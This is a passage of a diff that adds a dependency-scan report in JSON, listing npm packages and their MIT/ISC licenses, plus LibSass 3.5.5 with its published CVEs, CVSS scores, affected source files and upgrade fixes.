"matchType": "SHA1", + "sha1": "4eb21594c972bc40553d276e510539143db53e0a", + "name": "es6-promise-4.2.8.tgz", + "artifactId": "es6-promise-4.2.8.tgz", + "version": "4.2.8", + "groupId": "es6-promise", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/es6-promise/v/4.2.8" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "db78f720-6d95-4cc1-8664-cd50268ac3de", + "keyId": 27617933, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-load-config/-/postcss-load-config-2.1.0.tgz", + "homePage": "https://github.com/michael-ciniawsky/postcss-load-config#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-load-config" + }, + "matchType": "SHA1", + "sha1": "c84d692b7bb7b41ddced94ee62e8ab31b417b003", + "name": "postcss-load-config-2.1.0.tgz", + "artifactId": "postcss-load-config-2.1.0.tgz", + "version": "2.1.0", + "groupId": "postcss-load-config", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/8ad48177-f097-4c88-ae9b-707c1571fb44" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "391b987f-2b1b-4827-ac79-5bd371f3d022", + "keyId": 27463673, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", + "homePage": "https://github.com/sindresorhus/globals#readme", + "genericPackageIndex": "https://www.npmjs.org/package/globals" + }, + "matchType": "SHA1", + "sha1": "ab8795338868a0babd8525758018c2a7eb95c42e", + "name": "globals-11.12.0.tgz", + "artifactId": "globals-11.12.0.tgz", + "version": "11.12.0", + "groupId": "globals", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/globals/v/11.12.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "166314c7-9421-40b9-a8a3-10eeddbb0e8f", + "keyId": 27277637, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/string-width/-/string-width-3.1.0.tgz", + "homePage": "https://github.com/sindresorhus/string-width#readme", + "genericPackageIndex": "https://www.npmjs.org/package/string-width" + }, + "matchType": "SHA1", + "sha1": "22767be21b62af1081574306f69ac51b62203961", + "name": "string-width-3.1.0.tgz", + "artifactId": "string-width-3.1.0.tgz", + "version": "3.1.0", + "groupId": "string-width", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/string-width" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8b39a42c-b160-4001-a281-3da763698c7b", + "keyId": 27612158, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mime/-/mime-2.4.4.tgz", + "homePage": "https://github.com/broofa/node-mime#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mime" + }, + "matchType": "SHA1", + "sha1": "bd7b91135fc6b01cde3e9bae33d659b63d8857e5", + "name": "mime-2.4.4.tgz", + "artifactId": "mime-2.4.4.tgz", + "version": "2.4.4", + "groupId": "mime", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/mime" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "18412aa6-2671-4c5b-b5d3-9f3212051ea1", + "keyId": 26948459, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", + "homePage": "https://github.com/hughsk/is-typedarray", + "genericPackageIndex": "https://www.npmjs.org/package/is-typedarray" + }, + "matchType": "SHA1", + "sha1": "e479c80858df0c1b11ddda6940f96011fcda4a9a", + "name": "is-typedarray-1.0.0.tgz", + "artifactId": "is-typedarray-1.0.0.tgz", + "version": "1.0.0", + "groupId": "is-typedarray", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/is-typedarray" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ad2e0f3f-b8e5-40f2-b253-0261d538d9ce", + "keyId": 26954764, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/y18n/-/y18n-4.0.0.tgz", + "homePage": "https://github.com/yargs/y18n", + "genericPackageIndex": "https://www.npmjs.org/package/y18n" + }, + "matchType": "SHA1", + "sha1": "95ef94f85ecc81d007c264e190a120f0a3c8566b", + "name": "y18n-4.0.0.tgz", + "artifactId": "y18n-4.0.0.tgz", + "version": "4.0.0", + "groupId": "y18n", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/y18n" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "53bed350-a46f-4f23-bb08-146d7598a79a", + "keyId": 27518396, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.0.tgz", + "homePage": "https://github.com/bitinn/node-fetch", + "genericPackageIndex": "https://www.npmjs.org/package/node-fetch" + }, + "matchType": "SHA1", + "sha1": "e633456386d4aa55863f676a7ab0daa8fdecb0fd", + "name": "node-fetch-2.6.0.tgz", + "artifactId": "node-fetch-2.6.0.tgz", + "version": "2.6.0", + "groupId": "node-fetch", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/node-fetch" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "eb32093b-7246-4a8d-9238-43d8a0df453a", + "keyId": 27598698, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/agent-base/-/agent-base-4.3.0.tgz", + "homePage": "https://github.com/TooTallNate/node-agent-base#readme", + "genericPackageIndex": "https://www.npmjs.org/package/agent-base" + }, + "matchType": "SHA1", + "sha1": "8165f01c436009bccad0b1d122f05ed770efc6ee", + "name": "agent-base-4.3.0.tgz", + "artifactId": "agent-base-4.3.0.tgz", + "version": "4.3.0", + "groupId": "agent-base", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d00d779a-5d70-4fba-a8da-b917768e4015" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4a911619-8a76-4479-8a4a-68efd0a94651", + "keyId": 26955814, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/is-fullwidth-code-point#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-fullwidth-code-point" + }, + "matchType": "SHA1", + "sha1": "a3b30a5c4f199183167aaab93beefae3ddfb654f", + "name": "is-fullwidth-code-point-2.0.0.tgz", + "artifactId": "is-fullwidth-code-point-2.0.0.tgz", + "version": "2.0.0", + "groupId": "is-fullwidth-code-point", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/is-fullwidth-code-point/v/2.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c932a50e-40ac-4b5e-aa2c-b783b53869b4", + "keyId": 27656682, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/isomorphic-unfetch/-/isomorphic-unfetch-3.0.0.tgz", + "homePage": "https://github.com/developit/unfetch#readme", + "genericPackageIndex": "https://www.npmjs.org/package/isomorphic-unfetch" + }, + "matchType": "SHA1", + "sha1": "de6d80abde487b17de2c400a7ef9e5ecc2efb362", + "name": "isomorphic-unfetch-3.0.0.tgz", + "artifactId": "isomorphic-unfetch-3.0.0.tgz", + "version": "3.0.0", + "groupId": "isomorphic-unfetch", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "Project home page", + "reference": "https://github.com/developit/unfetch" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d4336d65-61a1-4a3c-b579-95787ca7e180", + "keyId": 26948667, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", + "homePage": "https://github.com/jensyt/imurmurhash-js", + "genericPackageIndex": "https://www.npmjs.org/package/imurmurhash" + }, + "matchType": "SHA1", + "sha1": "9218b9b2b928a238b13dc4fb6b6d576f231453ea", + "name": "imurmurhash-0.1.4.tgz", + "artifactId": "imurmurhash-0.1.4.tgz", + "version": "0.1.4", + "groupId": "imurmurhash", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/044ac3d4-d30e-4b7e-8173-ede28135854c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "225b21c4-52c3-4e09-8d27-4e8b92228f67", + "keyId": 27678617, + "type": "SOURCE_LIBRARY", + "languages": "C++", + "references": { + "url": "https://github.com/sass/libsass.git", + "homePage": "http://libsass.org", + "downloadLink": "https://github.com/sass/libsass/zipball/3.5.5" + }, + "sha1": "39e30874b9a5dd6a802c20e8b0470ba44eeba929", + "name": "libsass-3.5.5", + "artifactId": "libsass", + "version": "3.5.5", + "groupId": "sass", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "License File", + "reference": "License File (https://github.com/sass/libsass/blob/3.5.5/LICENSE)" + } + ], + "vulnerabilities": [ + { + "name": "CVE-2018-11499", + "type": "CVE", + "severity": "HIGH", + "score": 7.5, + "cvss3_severity": "HIGH", + "cvss3_score": 9.8, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "publishDate": "2018-05-26", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11499", + "description": "A use-after-free vulnerability exists in handle_error() in sass_context.cpp in LibSass 3.4.x and 3.5.x through 3.5.4 that could be leveraged to cause a denial of service (application crash) or possibly unspecified other impact.", + "topFix": { + "vulnerability": "CVE-2018-11499", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11499", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2018-05-26", + "message": "Upgrade to version" + }, + "allFixes": [ + { + "vulnerability": "CVE-2018-11499", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11499", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2018-05-26", + "message": "Upgrade to version" + }, + { + "vulnerability": "CVE-2018-11499", + "type": "CHANGE_FILES", + "origin": "GITHUB_COMMIT", + "url": "https://github.com/sass/libsass/commit/930857ce4938f64ce1c31463dbd19b1aa781a5f7", + "fixResolution": "Replace or update the following files: error_handling.cpp, error_handling.hpp, parser.cpp", + "date": "2018-11-23", + "message": "Fix heap-use-after-free in Parser error handling\n\nFixes #2643" + } + ], + "sourceFiles": [ + { + "name": "parser.cpp", + "sha1": "83ce8a6dfdf9df13d65dd365dbeca5ac2a8d04b7", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/parser.cpp", + "id": 2882382 + }, + { + "name": "error_handling.cpp", + "sha1": "30a103a2459e09fa4c44b7cfda26b166dba049af", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/error_handling.cpp", + "id": 2707305 + }, + { + "name": "sass_context.cpp", + "sha1": "b885fda151484e58b1cec85a3def9aca84e7eb6b", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/sass_context.cpp", + "id": 2825567 + }, + { + "name": "error_handling.hpp", + "sha1": "1b01f1b98b605df37056fd4559bfc2dfa1e3e95c", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/error_handling.hpp", + "id": 2707317 + } + ], + "references": [] + }, + { + "name": "CVE-2018-11693", + "type": "CVE", + "severity": "MEDIUM", + "score": 5.8, + "cvss3_severity": "HIGH", + "cvss3_score": 8.1, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", + "publishDate": "2018-06-04", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11693", + "description": "An issue was discovered in LibSass through 3.5.4. An out-of-bounds read of a memory region was found in the function Sass::Prelexer::skip_over_scopes which could be leveraged by an attacker to disclose information or manipulated to read from unmapped memory causing a denial of service.", + "topFix": { + "vulnerability": "CVE-2018-11693", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11693", + "fixResolution": "Upgrade to version LibSass - 3.5.5", + "date": "2018-06-04", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "prelexer.hpp", + "sha1": "12ee2fa341c32e7c399165689c959c462f4df862", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/prelexer.hpp", + "id": 2707336 + } + ], + "references": [] + }, + { + "name": "CVE-2018-11694", + "type": "CVE", + "severity": "MEDIUM", + "score": 6.8, + "cvss3_severity": "HIGH", + "cvss3_score": 8.8, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "publishDate": "2018-06-04", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11694", + "description": "An issue was discovered in LibSass through 3.5.4. A NULL pointer dereference was found in the function Sass::Functions::selector_append which could be leveraged by an attacker to cause a denial of service (application crash) or possibly have unspecified other impact.", + "topFix": { + "vulnerability": "CVE-2018-11694", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11694", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2018-06-04", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "functions.cpp", + "sha1": "105c55d32debe700058f3261bea27e151ad7b4dc", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/functions.cpp", + "id": 2707368 + } + ], + "references": [] + }, + { + "name": "CVE-2018-11695", + "type": "CVE", + "severity": "MEDIUM", + "score": 6.8, + "cvss3_severity": "HIGH", + "cvss3_score": 8.8, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "publishDate": "2018-06-04", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11695", + "description": "An issue was discovered in LibSass through 3.5.2. A NULL pointer dereference was found in the function Sass::Expand::operator which could be leveraged by an attacker to cause a denial of service (application crash) or possibly have unspecified other impact.", + "topFix": { + "vulnerability": "CVE-2018-11695", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11695", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2018-06-04", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "expand.cpp", + "sha1": "ea0b847a2773e3f945780f70ab3cb259684d7788", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/expand.cpp", + "id": 2707372 + } + ], + "references": [] + }, + { + "name": "CVE-2018-11697", + "type": "CVE", + "severity": "MEDIUM", + "score": 5.8, + "cvss3_severity": "HIGH", + "cvss3_score": 8.1, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", + "publishDate": "2018-06-04", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11697", + "description": "An issue was discovered in LibSass through 3.5.4. An out-of-bounds read of a memory region was found in the function Sass::Prelexer::exactly() which could be leveraged by an attacker to disclose information or manipulated to read from unmapped memory causing a denial of service.", + "topFix": { + "vulnerability": "CVE-2018-11697", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11697", + "fixResolution": "Upgrade to version LibSass - 3.6.0", + "date": "2019-09-01", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "parser.cpp", + "sha1": "83ce8a6dfdf9df13d65dd365dbeca5ac2a8d04b7", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/parser.cpp", + "id": 2882382 + }, + { + "name": "lexer.hpp", + "sha1": "b99ae9ab35fca59ff79a0f5bd34b952ed7b52388", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/lexer.hpp", + "id": 2707333 + }, + { + "name": "lexer.cpp", + "sha1": "debb915e2e3f530f417d72009dfa515df4ca50b2", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/lexer.cpp", + "id": 2707375 + } + ], + "references": [] + }, + { + "name": "CVE-2018-11698", + "type": "CVE", + "severity": "MEDIUM", + "score": 5.8, + "cvss3_severity": "HIGH", + "cvss3_score": 8.1, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", + "publishDate": "2018-06-04", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11698", + "description": "An issue was discovered in LibSass through 3.5.4. An out-of-bounds read of a memory region was found in the function Sass::handle_error which could be leveraged by an attacker to disclose information or manipulated to read from unmapped memory causing a denial of service.", + "topFix": { + "vulnerability": "CVE-2018-11698", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-11698", + "fixResolution": "Upgrade to version LibSass - 3.6.0", + "date": "2019-08-06", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "sass_context.cpp", + "sha1": "b885fda151484e58b1cec85a3def9aca84e7eb6b", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/sass_context.cpp", + "id": 2825567 + } + ], + "references": [] + }, + { + "name": "CVE-2018-19797", + "type": "CVE", + "severity": "MEDIUM", + "score": 4.3, + "cvss3_severity": "MEDIUM", + "cvss3_score": 6.5, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "publishDate": "2018-12-03", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-19797", + "description": "In LibSass 3.5.5, a NULL Pointer Dereference in the function Sass::Selector_List::populate_extends in SharedPtr.hpp (used by ast.cpp and ast_selectors.cpp) may cause a Denial of Service (application crash) via a crafted sass input file.", + "topFix": { + "vulnerability": "CVE-2018-19797", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-19797", + "fixResolution": "Upgrade to version LibSass - 3.6.0", + "date": "2019-09-01", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "functions.cpp", + "sha1": "105c55d32debe700058f3261bea27e151ad7b4dc", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/functions.cpp", + "id": 2707368 + }, + { + "name": "SharedPtr.cpp", + "sha1": "1f2284c90b7b49bb6ff489dd184509032b8e9cc7", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/memory/SharedPtr.cpp", + "id": 2707330 + } + ], + "references": [] + }, + { + "name": "CVE-2018-19826", + "type": "CVE", + "severity": "MEDIUM", + "score": 4.3, + "cvss3_severity": "MEDIUM", + "cvss3_score": 6.5, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "publishDate": "2018-12-03", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-19826", + "description": "** DISPUTED ** In inspect.cpp in LibSass 3.5.5, a high memory footprint caused by an endless loop (containing a Sass::Inspect::operator()(Sass::String_Quoted*) stack frame) may cause a Denial of Service via crafted sass input files with stray \u0027\u0026\u0027 or \u0027/\u0027 characters. NOTE: Upstream comments indicate this issue is closed as \"won\u0027t fix\" and \"works as intended\" by design.", + "topFix": { + "vulnerability": "CVE-2018-19826", + "type": "CHANGE_FILES", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-19826", + "fixResolution": "Replace or update the following file: LibSass - 3.6.0", + "date": "2019-09-01", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "inspect.cpp", + "sha1": "1e63ad992cfdef6edb6ca8010e410bf21c174a0f", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/inspect.cpp", + "id": 2882386 + } + ], + "references": [] + }, + { + "name": "CVE-2018-19827", + "type": "CVE", + "severity": "MEDIUM", + "score": 6.8, + "cvss3_severity": "HIGH", + "cvss3_score": 8.8, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "publishDate": "2018-12-03", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-19827", + "description": "In LibSass 3.5.5, a use-after-free vulnerability exists in the SharedPtr class in SharedPtr.cpp (or SharedPtr.hpp) that may cause a denial of service (application crash) or possibly have unspecified other impact.", + "topFix": { + "vulnerability": "CVE-2018-19827", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://github.com/sass/libsass/pull/2784", + "fixResolution": "Upgrade to version LibSass - 3.6.0", + "date": "2019-08-29", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "expand.cpp", + "sha1": "ea0b847a2773e3f945780f70ab3cb259684d7788", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/expand.cpp", + "id": 2707372 + }, + { + "name": "SharedPtr.cpp", + "sha1": "1f2284c90b7b49bb6ff489dd184509032b8e9cc7", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/memory/SharedPtr.cpp", + "id": 2707330 + } + ], + "references": [] + }, + { + "name": "CVE-2018-19838", + "type": "CVE", + "severity": "MEDIUM", + "score": 4.3, + "cvss3_severity": "MEDIUM", + "cvss3_score": 6.5, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "publishDate": "2018-12-04", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-19838", + "description": "In LibSass prior to 3.5.5, functions inside ast.cpp for IMPLEMENT_AST_OPERATORS expansion allow attackers to cause a denial-of-service resulting from stack consumption via a crafted sass file, as demonstrated by recursive calls involving clone(), cloneChildren(), and copy().", + "topFix": { + "vulnerability": "CVE-2018-19838", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://github.com/sass/libsass/blob/3.6.0/src/ast.cpp", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2019-07-01", + "message": "Upgrade to version" + }, + "allFixes": [ + { + "vulnerability": "CVE-2018-19838", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://github.com/sass/libsass/blob/3.6.0/src/ast.cpp", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2019-07-01", + "message": "Upgrade to version" + }, + { + "vulnerability": "CVE-2018-19838", + "type": "CHANGE_FILES", + "origin": "GITHUB_COMMIT", + "url": "https://github.com/sass/libsass/commit/e2b6f9ad3d9a9b7a02103f3674c37048d765afdf#diff-92086e1a4e97daeecc3c008b62990e96", + "fixResolution": "Replace or update the following files: error_handling.cpp, eval.hpp, sass_values.cpp, backtrace.cpp, ast_def_macros.hpp, backtrace.hpp, parser.hpp, cssize.cpp, ast_fwd_decl.hpp, check_nesting.cpp, cssize.hpp, sass_context.cpp, Makefile.conf, functions.cpp, context.cpp, operators.cpp, context.hpp, operators.hpp, expand.hpp, functions.hpp, expand.cpp, ast.hpp, libsass.targets, debugger.hpp, output.cpp, libsass.vcxproj.filters, check_nesting.hpp, bind.cpp, extend.cpp, error_handling.hpp, eval.cpp, ast.cpp, parser.cpp", + "date": "2018-03-14", + "message": "Implement more detailed backtraces\n\nCleaned up exceptions a bit and moved static\noperators from eval to its own compile unit." + } + ], + "sourceFiles": [ + { + "name": "ast.cpp", + "sha1": "6489abfecbfd4d8c2c787b109438ccdf82dcb1e7", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/ast.cpp", + "id": 2707384 + } + ], + "references": [] + }, + { + "name": "CVE-2018-19839", + "type": "CVE", + "severity": "MEDIUM", + "score": 4.3, + "cvss3_severity": "MEDIUM", + "cvss3_score": 6.5, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "publishDate": "2018-12-04", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-19839", + "description": "In LibSass prior to 3.5.5, the function handle_error in sass_context.cpp allows attackers to cause a denial-of-service resulting from a heap-based buffer over-read via a crafted sass file.", + "topFix": { + "vulnerability": "CVE-2018-19839", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-19839", + "fixResolution": "Upgrade to version 3.5.5", + "message": "Upgrade to version" + }, + "allFixes": [ + { + "vulnerability": "CVE-2018-19839", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-19839", + "fixResolution": "Upgrade to version 3.5.5", + "message": "Upgrade to version" + }, + { + "vulnerability": "CVE-2018-19839", + "type": "CHANGE_FILES", + "origin": "GITHUB_COMMIT", + "url": "https://github.com/sass/libsass/commit/2cabd116b95d67dcd9d44fcb936dee03f4fc71b9", + "fixResolution": "Replace or update the following files: checked.h, core.h", + 